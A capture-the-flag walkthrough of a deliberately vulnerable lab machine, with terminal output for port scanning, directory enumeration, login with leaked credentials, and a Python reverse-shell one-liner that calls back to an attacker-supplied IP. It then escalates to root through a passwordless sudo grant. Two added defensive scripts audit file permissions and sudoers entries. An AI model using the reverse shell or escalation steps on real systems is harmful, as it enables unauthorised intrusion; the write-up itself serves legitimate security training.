1. Port scan
┌──(root💀kali)-[/home/hzh/桌面]
└─# nmap -p- -sC -sV -T4 10.10.192.126
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-27 19:59 CST
Nmap scan report for 10.10.192.126
Host is up (0.40s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 af:e2:3f:8b:e4:e4:95:60:a7:ae:e1:14:26:af:3c:ed (RSA)
|   256 25:0d:29:32:47:dd:2d:ec:86:66:08:b1:63:cd:78:6f (ECDSA)
|_  256 d8:85:fe:42:1c:8c:f9:d5:31:de:a4:6a:82:e4:ae:42 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 954.13 seconds
The target exposes ports 22 (SSH) and 80 (HTTP). We start with the web service that Apache serves on port 80.
2. Web site
First, use the gobuster tool to enumerate directories on the site:
┌──(root💀kali)-[/usr/share/wordlists/dirbuster]
└─# gobuster dir -u http://10.10.192.126 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -o output.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.192.126
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/27 20:42:08 Starting gobuster in directory enumeration mode
===============================================================
/index.html
/robots.txt
/login.php
Next, inspect the site's source code: it contains a username. Then open the /robots.txt page that gobuster found; it contains a string that looks like a password.
Go to /login.php and log in with that username and password.
After logging in there is a command-execution panel. Use Python to obtain a reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP_ADDRESS",YOUR_PORT_NUMBER));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Replace "YOUR_IP_ADDRESS" with your own IP address
- Replace "YOUR_PORT_NUMBER" with your own port number
Then listen with netcat in your own terminal to catch the shell that calls back:
┌──(root💀kali)-[/home/hzh/桌面]
└─# nc -lvp 4444
listening on [any] 4444 ...
10.10.192.126: inverse host lookup failed: Unknown host
connect to [10.4.19.255] from (UNKNOWN) [10.10.192.126] 38010
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-10-192-126:/var/www/html$
Here, for a more comfortable session, we use pty (pseudo-terminal) to upgrade to a proper interactive terminal.
List the current directory and print the Sup3rS3cretPickl3Ingred.txt file:
www-data@ip-10-10-192-126:/var/www/html$ ls -al
ls -al
total 40
drwxr-xr-x 3 root   root   4096 Feb 10  2019 .
drwxr-xr-x 3 root   root   4096 Feb 10  2019 ..
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10  2019 assets
-rwxr-xr-x 1 ubuntu ubuntu   54 Feb 10  2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10  2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10  2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10  2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 robots.txt
www-data@ip-10-10-192-126:/var/www/html$ cat Su
cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
www-data@ip-10-10-192-126:/var/www/html$
Switch to /home; there is a directory for the user rick, and inside it is the second clue:
www-data@ip-10-10-192-126:/home$ ls -al
ls -al
total 16
drwxr-xr-x  4 root   root   4096 Feb 10  2019 .
drwxr-xr-x 23 root   root   4096 Mar 27 11:48 ..
drwxrwxrwx  2 root   root   4096 Feb 10  2019 rick
drwxr-xr-x  4 ubuntu ubuntu 4096 Feb 10  2019 ubuntu
www-data@ip-10-10-192-126:/home$ cd rick
cd rick
www-data@ip-10-10-192-126:/home/rick$ ls -al
ls -al
total 12
drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients
www-data@ip-10-10-192-126:/home/rick$ cat second ingredients
</rick$ cat second\ ingredients
second\ ingredients
1 jerry tear
www-data@ip-10-10-192-126:/home/rick$
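The two listings above show a world-writable index.html in the web root and a world-writable /home/rick. As an added defender-side check (not code from the original walkthrough), this script parses ls -al output and flags entries that any local user could modify; the sample listings are constructed to mirror what was seen here, and the helper names are my own.

```python
"""Flag world-writable entries in 'ls -al' listings (added example, not from the writeup)."""
import re

# A 10-char mode string such as -rwxrwxrwx or drwxr-xr-x (optional ACL/SELinux suffix).
MODE_RE = re.compile(r"^[-dlcbps][rwxsStT-]{9}[.+@]?$")

# Constructed listings that mirror the web root and /home/rick seen in the walkthrough.
SAMPLE_WEBROOT = """\
total 40
drwxr-xr-x 3 root   root   4096 Feb 10  2019 .
drwxr-xr-x 3 root   root   4096 Feb 10  2019 ..
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10  2019 login.php
"""
SAMPLE_HOME_RICK = """\
total 12
drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients
"""

def parse_ls(listing):
    """Yield (mode, owner, group, name); skips 'total', prompts and echoed commands."""
    for line in listing.splitlines():
        parts = line.split(None, 8)   # at most 9 fields, so names with spaces survive
        if len(parts) < 9 or not MODE_RE.match(parts[0]):
            continue
        yield parts[0], parts[2], parts[3], parts[8]

def world_writable(listing, skip_dots=True):
    """Return [(name, mode, owner)] for entries whose 'other' write bit is set.

    A drwxrwxrwx directory lets any local user plant or replace files in it;
    a world-writable index.html lets any local account deface or backdoor the
    site. Sticky-bit directories (drwxrwxrwt) are still reported."""
    hits = []
    for mode, owner, _group, name in parse_ls(listing):
        if skip_dots and name in (".", ".."):
            continue
        if mode[8] == "w":            # chars 7-9 are the 'other' rwx triplet
            hits.append((name, mode, owner))
    return hits

if __name__ == "__main__":
    for sample in (SAMPLE_WEBROOT, SAMPLE_HOME_RICK):
        for name, mode, owner in world_writable(sample, skip_dots=False):
            print(f"{mode} {owner:7} {name}")
```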
The next file is in /root, which means we need to escalate privileges. Use sudo -l to list the commands that the current user (or a specified user) may run through sudo, and with what privileges:
www-data@ip-10-10-192-126:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on ip-10-10-192-126.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-192-126.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
Use sudo bash -i to get an interactive shell with root privileges:
www-data@ip-10-10-192-126:/home/rick$ sudo bash -i
sudo bash -i
root@ip-10-10-192-126:/home/rick# cd /root
cd /root
root@ip-10-10-192-126:~# ls -al
ls -al
total 28
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 Mar 27 11:48 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap
root@ip-10-10-192-126:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-192-126:~#
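The grant that sudo -l revealed, (ALL) NOPASSWD: ALL for www-data, is what turns a web shell into root in one command. As an added defender-side check (not from the original writeup), this script audits sudoers-style lines for such grants; SAMPLE_SUDOERS is constructed and SERVICE_ACCOUNTS is an assumed list.

```python
"""Audit /etc/sudoers-style grants for dangerous entries (added example, not from the writeup)."""
import re

# Service accounts that should never hold sudo rights (assumed list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# user  host=(runas[:group])  [TAG: ...]  command list
GRANT_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)

# Constructed sample; the www-data line mirrors the grant 'sudo -l' showed on the target.
SAMPLE_SUDOERS = """\
Defaults env_reset, mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
nginx    ALL=(root) /usr/sbin/nginx -s reload   # reload only
"""

def audit_sudoers(text):
    """Return [(user, severity, reason)] for grants a defender should review."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = GRANT_RE.match(line)
        if not m or m.group("user") == "root":       # root's own grant is expected
            continue
        user, cmds, tags = m.group("user"), m.group("rest").strip(), []
        while (t := re.match(r"([A-Z]+):\s*", cmds)):  # NOPASSWD:, SETENV:, ...
            tags.append(t.group(1))
            cmds = cmds[t.end():]
        runas = (m.group("runas") or "root").split(":")[0]
        as_root = runas in ("ALL", "root")
        if cmds == "ALL" and as_root and "NOPASSWD" in tags:
            sev, why = "critical", "passwordless root for any command (sudo bash -i gives a root shell)"
        elif user in SERVICE_ACCOUNTS:
            sev, why = "high", f"service account may sudo: {cmds}"
        elif cmds == "ALL" and as_root:
            sev, why = "medium", "any command as root (password required)"
        else:
            continue
        findings.append((user, sev, why))
    return findings

if __name__ == "__main__":
    for user, sev, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{sev:8} {user:9} {why}")
```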